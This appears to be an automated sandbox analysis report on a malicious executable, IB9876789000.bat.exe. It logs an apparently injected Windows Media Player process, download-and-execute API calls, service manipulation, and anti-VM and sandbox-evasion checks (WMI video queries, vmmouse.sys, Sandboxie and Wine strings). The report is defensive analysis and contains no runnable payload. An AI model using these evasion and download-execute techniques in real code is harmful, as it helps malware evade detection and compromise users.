                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00455EAF push ecx; ret 6_2_00455EC2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00433FF6 push ecx; ret 6_2_00434009
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_10002806 push ecx; ret 6_2_10002819
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00406128 ShellExecuteW,URLDownloadToFileW,6_2_00406128
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_00419BC4

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041BCE3
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Delayed program exit found
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040E54F Sleep,ExitProcess,6_2_0040E54F
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLP
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAMEP
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory allocated: 2437EFC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory allocated: 2437F750000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sysJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
